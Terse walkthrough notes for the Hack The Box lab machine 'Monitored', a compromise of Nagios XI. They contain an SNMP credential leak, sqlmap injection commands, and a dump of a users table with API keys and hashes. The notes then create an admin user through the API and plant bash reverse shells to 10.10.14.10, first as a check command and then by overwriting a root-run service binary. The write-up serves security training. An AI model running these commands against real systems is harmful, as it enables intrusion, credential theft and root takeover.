22,80,389,443,5667 monitored.htb nagios.monitored.htb
found in ports 443 by gobuster https://nagios.monitored.htb/nagiosxi/terminal/ https://nagios.monitored.htb/nagiosxi/login.php
from udp scan:
sudo nmap -sU -sC -sV -T4 --min-rate=500 monitored.htb -p161,162
found credentials from snmp (result from nmap scan port 161)
svc:XjH7VCehowpR1xZB
the credential is not valid for login page we gained from previous stages
let’s see if there is any other login page
try
with creds, then we get
searching on exploitation from googling
https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php
get the POST-auth by curl , then try sqlmap
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ks https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch --dbs
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ks https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi --tables
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ks https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi -T xi_users --dump
Database: nagiosxi Table: xi_users [2 entries] +---------+----------------------+---------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+ | user_id | name | email | api_key | enabled | password | username | created_by | last_login | api_enabled | last_edited | created_time | last_attempt | backend_ticket | last_edited_by | login_attempts | last_password_change | +---------+----------------------+---------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+ | 1 | Nagios Administrator | admin@monitored.htb | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1 | $2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0 | 1701931372 | 1 | 1701427555 | 0 | 0 | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0 | 5 | 0 | 1701427555 | | 2 | svc | svc@monitored.htb | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0 | $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc | 1 | 1699724476 | 1 | 1699728200 | 1699634403 | 1705298638 | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1 | 6 | 1699697433 | +---------+----------------------+---------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
Add a new user by using admin’s api_key
IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL
curl -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=ivan&password=123456&name=ivan&email=ivan@gmail.com&auth_level=admin"
we have
ivan:123456 then login, required change to 123123
add a check commands here, we set a rev shell. then apply configuration
bash -c 'bash -i >& /dev/tcp/10.10.14.10/6666 0>&1'
go to hosts to activate it
get the user shell
sudo -l User nagios may run the following commands on localhost: (root) NOPASSWD: /etc/init.d/nagios start (root) NOPASSWD: /etc/init.d/nagios stop (root) NOPASSWD: /etc/init.d/nagios restart (root) NOPASSWD: /etc/init.d/nagios reload (root) NOPASSWD: /etc/init.d/nagios status (root) NOPASSWD: /etc/init.d/nagios checkconfig (root) NOPASSWD: /etc/init.d/npcd start (root) NOPASSWD: /etc/init.d/npcd stop (root) NOPASSWD: /etc/init.d/npcd restart (root) NOPASSWD: /etc/init.d/npcd reload (root) NOPASSWD: /etc/init.d/npcd status (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php * (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php * (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/migrate/migrate.php * (root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh (root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh (root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh * (root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh * (root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *
The shell is unstable. We upload a ssh public key to enhance the compatibility of our shell.
Generate a pair of keys
ssh-keygen -t rsa -b 4096
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCatX96WZAHuhuaZ4Q9V1VvAVygN+HktXmEnX4gYcbjE8lWeYG4gszN4zLzZQY9pgtMBurbVh6d9a4kqJPIx/ASig2qij4T00b5IcjX4a6jDMF1NzNribsQoy8DGCYVSNMoFLzmu4MA3jhg17bwUoMey7eL6CkWyNbCiHIp+RCBXqxYB9m4G1XRTKSMxXn0IovMxhr5w/yywxTHdh0kmwLdqhyNGaFVWNnyT/YCV0nZ2vAzETAS7FkcFG3ZJ0CrI2NDOLqMqYg4Fu+2+fV2jo2BfTarO201GJ0VkDYjbiyXZImDj5N3uehDtQEbFb04n3xUFtqL3WOM1+N6d4+NR6JE8B9tcKRShgrAtpY2hnaZgRF2vHoKViiPEsdV/BtZFLUnHXFaulqiL+sGMeZoGMCsyAxWzrLqa2geaEsA468onLB9S/b2Y/I0crSxxZvhvPumdO2gYGBWZpEsoOoWCQSNxIr1SkhwtTa0MRb+iBVmT47VHF2dX7KsZy1kZVswgT3g1n/OnqhdwBgjaJLa7HXE2RgqayWJ1Rf/Oz+aB/vjlJLLgqkkCJjWIcyX9XZDGWPK7cPMe40ZYpIJdqwauHEUgz3DdZzX3qmKxwnmxBdhJvfdT4mjI0Fyzj+dGDRaMZuGRBgHj7hhIEYrjskQLCIKLkQmVymIkmF4MgaWB72Apw==" > ~/.ssh/authorized_keys
then upload the public key
mkdir ~/.ssh
vi ~/.ssh/authorized_keys
ssh -i ~/.ssh/id_rsa nagios@monitored.htb
then connect it by ssh
Run linpeas.sh
/etc/systemd/system/multi-user.target.wants/mariadb.service could be executing some relative path /etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagios /etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagios /etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagios /etc/systemd/system/multi-user.target.wants/npcd.service is calling this writable executable: /usr/local/nagios/bin/npcd /etc/systemd/system/npcd.service is calling this writable executable: /usr/local/nagios/bin/npcd
vi /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
vi /usr/local/nagios/bin/npcd
#!/bin/bash bash -i >& /dev/tcp/10.10.14.10/4444 0>&1
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
get the root